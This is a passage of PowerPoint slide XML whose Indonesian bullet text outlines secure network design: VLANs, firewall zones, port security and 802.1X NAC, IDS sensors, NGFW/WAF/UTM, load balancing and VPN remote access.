              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN, subnet, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperhitungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 802.1X (NAC).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAC 802.1X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada batas zona, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 7 yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada port switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server proxy, NGFW, dan WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>samping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall/IPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengakomodasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs, situs-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN TLS dan IPsec. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop/shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
